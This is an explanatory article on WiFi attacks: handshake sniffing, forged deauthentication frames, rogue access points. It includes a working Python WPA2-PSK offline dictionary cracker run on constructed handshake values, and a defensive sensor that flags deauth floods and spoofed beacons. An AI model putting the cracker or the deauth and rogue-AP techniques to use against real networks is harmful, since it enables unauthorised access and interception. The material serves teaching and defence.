Common WiFi attacks under the 802.11 standard

Traffic sniffing

Virtually all WiFi traffic can be sniffed with a wireless adapter in monitor mode. Most Linux distributions support putting certain WiFi chipsets into monitor mode, in which the adapter hands every frame it hears on the channel to the host, not only the frames addressed to it. Encrypted networks are not as secure as you might think: WEP is broken, and even WPA2-PSK is exposed to offline password guessing. The attacker does not even have to wait for a client to connect. Because deauthentication frames are unauthenticated management frames, an attacker can spoof one to kick your device off the network and force it to authenticate again, so that the sniffer captures the fresh handshake.
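Why a forced re-authentication is valuable to the attacker, and why the WPA2-PSK dictionary attack discussed under "Brute Force Access" below works entirely offline, is easiest to see in code. The following is an added example, not code from the original article: it implements the PSK derivation and the four-way-handshake key schedule from IEEE 802.11i and runs a word list against a constructed handshake. The SSID, MAC addresses, nonces, EAPOL bytes and the passphrase "summer2019" are all made up for the example; real tools read them from a captured handshake.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: derive the 64-byte PTK from the PMK, both MAC addresses and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]  # KCK = bytes 0-15, KEK = 16-31, TK = 32-47


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2 with AKM PSK: MIC = HMAC-SHA1-128 over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, aa, spa, anonce, snonce, eapol_zeroed, mic, wordlist):
    """Offline dictionary attack: the first candidate whose derived KCK reproduces the captured MIC."""
    for candidate in wordlist:
        kck = prf512(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), mic):
            return candidate
    return None


# --- Constructed sample capture (hypothetical values, not a real handshake) ---
SSID = "corp-wifi"
AP_MAC = bytes.fromhex("001122334455")    # authenticator address (AA), from the beacon/message 1
STA_MAC = bytes.fromhex("66778899aabb")   # supplicant address (SPA), from message 2
ANONCE = bytes(range(32))                 # ANonce comes from message 1, SNonce from message 2
SNONCE = bytes(range(32, 64))
# Message 2 as it would appear on the wire with the 16-byte MIC field zeroed. Only the EAPOL
# header (version 1, type 3 = Key, length) is realistic; the rest is placeholder bytes.
EAPOL_M2_ZEROED = b"\x01\x03\x00\x75" + b"\x02\x01\x0a" + SNONCE + b"\x00" * 16 + b"\x00" * 64


def sample_capture() -> bytes:
    """Pretend the victim's passphrase is 'summer2019' and compute the MIC a sniffer would record."""
    kck = prf512(pmk_from_passphrase("summer2019", SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_M2_ZEROED)


def demo(wordlist=("password", "letmein", "summer2019", "corp-wifi")):
    """Run the dictionary attack against the constructed capture; returns the recovered passphrase."""
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2_ZEROED,
                           sample_capture(), wordlist)
```

Nothing in the attack touches the network after the handshake is captured: every guess costs 4096 HMAC-SHA1 iterations that depend only on the passphrase and the SSID, which is why precomputed tables for common SSIDs exist and why the defence is a long random passphrase on a non-default SSID.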
Because sniffing is passive and cannot be detected, treat virtually all WiFi communication, on open and on password-protected networks alike, as public, and rely on encryption at a higher layer such as HTTPS.

Brute Force Access

Like any other password, a wireless network password can be brute-forced. WEP can be cracked in minutes from captured traffic alone and should be considered useless. For a WPA/WPA2-PSK network the attacker captures the four-way handshake (forcing one with a deauthentication frame if no client happens to connect) and then runs an ordinary dictionary attack against it offline, so a weak passphrase falls quickly. Many of the password-cracking tools available today accept captured WiFi handshakes directly. Unlike passive sniffing, this method leaves traces: the deauthentication frames used to force a handshake, or repeated failed association attempts against the access point, are visible on the air. The only protection is a long, random passphrase and never using WEP.

WiFi Network Interference

Under the 802.11 standard, interfering with a WiFi network is simple: flood the relevant channel with junk. The usual method is to abuse Deauthentication and Disassociation frames. These are management frames, which the basic 802.11 standard neither encrypts nor authenticates, so anyone can forge them without being connected to the network (802.11w Protected Management Frames closes this hole, but only when both the access point and the client support it). By setting the sender address in the frame to the access point's address, an attacker within range can send a continuous stream of deauthentication frames that your device accepts as genuine, while also listening to the frames your device sends in response. A jammer script can simply monitor the list of all access points and clients in range and keep sending deauthentication frames to every client it sees.

Detecting Jammers

Tools such as nzyme detect deauthentication frames, and a Graylog log monitoring setup can alert on an unusual volume of a given frame subtype (the subtype field in the frame control header).

Rogue access points

A phone or laptop can discover WiFi networks in two ways, and both can be abused to make it connect automatically: 1. Beacon frames. An access point announces the existence of its network by sending beacons periodically; a mobile station uses them to learn the parameters it needs to join the network.
In an infrastructure network the access point is responsible for sending beacons, and the range of its beacons defines the basic service area. All connections in such a network go through the access point, so a station cannot be too far away or it will not receive the beacons. 2. Probe Request frames. A mobile station uses Probe Request frames to actively scan for the 802.11 networks currently in the area. The format of the Probe Request frame is shown in the figure below; all of its fields are mandatory. The frame contains two elements: the SSID being looked for and the data rates the mobile station supports. A station that receives the probe request uses these to decide whether the sender can join its network: the mobile station must support all data rates required by the network and must name the network it wants to join in the SSID field (an empty, wildcard SSID asks every access point in range to answer). The problem is that any device can send beacon frames, and answer probe requests, for any network. An attacker can therefore walk around with a rogue access point that answers every probe request it hears, or can deliberately send beacons for a target corporate network. Many devices now ship with a corresponding protection: if you are about to connect to a network that was encrypted when you last joined it but is open now, the device warns you. That protection does nothing, however, if the attacker knows the password of the network you previously joined, or if the network was open to begin with. Once your phone is associated with the malicious access point the attacker is in a man-in-the-middle position: they can monitor all of your traffic, launch attacks such as DNS spoofing, and even present you with a malicious captive-portal login page to collect credentials and more information about your browser.
Rogue access points are very difficult to identify: physically locating them is complex and they blend in with the existing access point infrastructure. They can, however, be detected with tools such as nzyme and Graylog. nzyme is an open source tool that records 802.11 management frames and forwards them to Graylog for WiFi security monitoring and incident response.

5 Ways to Detect Rogue Access Points

Method 1: BSSID whitelist

Like any other network device, every WiFi access point has a MAC address, and it is part of every frame it sends. In infrastructure mode the BSSID is the MAC address of the access point's station (STA) interface, and it uniquely identifies the basic service set (BSS) defined in the IEEE 802.11-1999 Wireless LAN specification. An easy way to detect rogue access points is therefore to keep a list of your trusted access points and their MAC addresses and compare them with the BSSIDs you see over the air. The weakness is that an attacker can trivially spoof a MAC address and bypass this check, which is why the following methods look at properties that are harder to fake.

Method 2: Asynchronous TSF timestamp

Every beacon carries a timestamp from the access point's Timing Synchronization Function (TSF), a microsecond counter to which all stations in the same BSS keep tightly synchronized (the tolerance is on the order of 25 microseconds). A rogue access point that spoofs a legitimate BSSID runs its own TSF counter, so its beacons carry timestamps that do not follow on from the genuine access point's; watching for these jumps exposes the impostor.

Method 3: Wrong channel

Keep a list of the channel each trusted access point is configured for; a beacon for a trusted BSSID that arrives on a different channel indicates a problem. This check is also easy for an attacker to bypass: they can survey the site and configure the rogue access point to use only the channel of the access point it impersonates.

Method 4: Encryption downgrade

An attacker who does not know the network password can spin up a rogue access point that advertises the same SSID as an open network, hoping that clients will join it anyway. A beacon for a trusted SSID whose capability field lacks the Privacy bit, or which carries no RSN information element, is an immediate red flag.
Method 5: Abnormal signal strength

There are many ways to detect rogue access points by analysing signal strength for anomalies. If an attacker sitting in a parking lot spoofs an access point, including its MAC address (BSSID), the average signal strength the sensor (nzyme) records for that BSSID changes suddenly, because the attacker is at a different distance from the sensor than the real access point. The check needs a baseline of normal readings per BSSID and a tolerance wide enough to absorb ordinary fading, or it will alert constantly.
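The following added example (not code from the article, from nzyme, or from Graylog) shows how both detections described above can be implemented over raw 802.11 management frames: a minimal sensor that decodes the frame control field, counts deauthentication and disassociation frames per BSSID in a sliding window for the jammer detection described under "Detecting Jammers", and applies the five rogue access point checks (Methods 1 to 5) to beacon frames. The trusted-network table, the thresholds (10 deauths per second, 1 ms TSF tolerance, 15 dB signal tolerance), the sample frames and the signal readings are all constructed for the example; a real sensor would read frames from a monitor-mode interface and tune the thresholds against its own environment.

```python
import struct
from collections import defaultdict, deque

# Management subtypes. Frame control byte 0: type in bits 2-3 (0 = management), subtype in bits 4-7.
BEACON, DISASSOC, DEAUTH = 0x8, 0xA, 0xC


def mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Minimal management frame: frame control, duration, addr1-3, sequence control, body."""
    return bytes([subtype << 4, 0]) + b"\0\0" + dst + src + bssid + b"\0\0" + body


def beacon(bssid, ssid, channel, tsf, encrypted=True):
    """Beacon body: TSF timestamp, beacon interval, capability (bit 4 = Privacy), then IEs."""
    cap = 0x0001 | (0x0010 if encrypted else 0)            # ESS, plus Privacy when encrypted
    ies = bytes([0, len(ssid)]) + ssid.encode() + bytes([3, 1, channel])  # SSID, DS Parameter Set
    if encrypted:
        ies += b"\x30\x02\x01\x00"                          # RSN IE (id 48) stub: version 1 only
    return mgmt_frame(BEACON, b"\xff" * 6, bssid, bssid, struct.pack("<QHH", tsf, 100, cap) + ies)


def parse(frame):
    """Fields the checks need; beacons additionally get their fixed fields and IEs decoded."""
    f = {"type": (frame[0] >> 2) & 3, "subtype": frame[0] >> 4, "bssid": frame[16:22]}
    if f["type"] == 0 and f["subtype"] == BEACON:
        body = frame[24:]
        f["tsf"], _, cap = struct.unpack_from("<QHH", body)
        f["privacy"] = bool(cap & 0x10)
        ies, off = {}, 12
        while off + 2 <= len(body):                         # walk the tagged parameters
            eid, n = body[off], body[off + 1]
            ies[eid] = body[off + 2:off + 2 + n]
            off += 2 + n
        f["ssid"] = ies.get(0, b"").decode(errors="replace")
        f["channel"] = ies[3][0] if 3 in ies else None
        f["rsn"] = 48 in ies
    return f


class Sensor:
    """Hypothetical nzyme-style sensor. trusted maps SSID -> {BSSID: (channel, encrypted)}."""
    def __init__(self, trusted, deauth_limit=10, window_us=1_000_000, tsf_tol_us=1000, rssi_tol_db=15):
        self.trusted, self.deauth_limit, self.window_us = trusted, deauth_limit, window_us
        self.tsf_tol_us, self.rssi_tol_db = tsf_tol_us, rssi_tol_db
        self.deauths = defaultdict(deque)   # BSSID -> capture times of recent deauth/disassoc
        self.last_tsf = {}                  # BSSID -> (beacon TSF, capture time) of the last beacon
        self.rssi = defaultdict(list)       # BSSID -> baseline signal readings

    def observe(self, now_us, frame, rssi_dbm):
        """Feed one captured frame; returns a list of alert strings (empty when benign)."""
        f = parse(frame)
        if f["type"] != 0:
            return []
        if f["subtype"] in (DEAUTH, DISASSOC):
            return self._deauth(now_us, f["bssid"])
        return self._beacon(now_us, f, rssi_dbm) if f["subtype"] == BEACON else []

    def _deauth(self, now, bssid):
        q = self.deauths[bssid]
        q.append(now)
        while now - q[0] > self.window_us:                  # drop frames outside the window
            q.popleft()
        return [f"deauth flood: {len(q)} frames in window from {bssid.hex(':')}"] if len(q) >= self.deauth_limit else []

    def _beacon(self, now, f, rssi):
        aps = self.trusted.get(f["ssid"])
        if aps is None:
            return []                                       # somebody else's network
        if f["bssid"] not in aps:
            return ["unknown BSSID for trusted SSID"]       # method 1: BSSID allowlist
        channel, encrypted = aps[f["bssid"]]
        alerts = []
        prev = self.last_tsf.get(f["bssid"])                # method 2: the AP's TSF must advance
        if prev and abs((f["tsf"] - prev[0]) - (now - prev[1])) > self.tsf_tol_us:
            alerts.append("TSF timestamp jump")             #   in step with the sensor's clock
        self.last_tsf[f["bssid"]] = (f["tsf"], now)
        if f["channel"] != channel:                         # method 3: wrong channel
            alerts.append("wrong channel")
        if encrypted and not (f["privacy"] and f["rsn"]):   # method 4: encryption downgrade
            alerts.append("encryption downgrade")
        hist = self.rssi[f["bssid"]]                        # method 5: compare with the baseline
        if len(hist) >= 5 and abs(rssi - sum(hist) / len(hist)) > self.rssi_tol_db:
            alerts.append("signal strength anomaly")
        elif not alerts:
            hist.append(rssi)                               # only benign beacons extend the baseline
        return alerts


def demo():
    """Six genuine beacons, then a spoofed-BSSID open rogue AP, then a deauth flood (all constructed)."""
    ap = bytes.fromhex("001122334455")
    s = Sensor({"corp-wifi": {ap: (6, True)}})
    benign, t, tsf = [], 0, 5_000_000
    for i in range(6):                                      # 100 ms beacon interval, steady signal
        benign += s.observe(t, beacon(ap, "corp-wifi", 6, tsf), -50 + i % 2)
        t, tsf = t + 100_000, tsf + 100_000
    rogue = s.observe(t, beacon(ap, "corp-wifi", 11, 42_000, encrypted=False), -30)
    flood = []
    for i in range(12):                                     # 12 broadcast deauths in 165 ms
        frame = mgmt_frame(DEAUTH, b"\xff" * 6, ap, ap, b"\x07\x00")  # reason 7: class 3 frame
        flood += s.observe(t + i * 15_000, frame, -30)
    return benign, rogue, flood
```

The spoofed beacon trips all four of the checks that survive MAC spoofing at once, which is the point of running them together: an attacker can match the channel or keep the network encrypted, but cannot continue the real access point's TSF counter or transmit from the real access point's position.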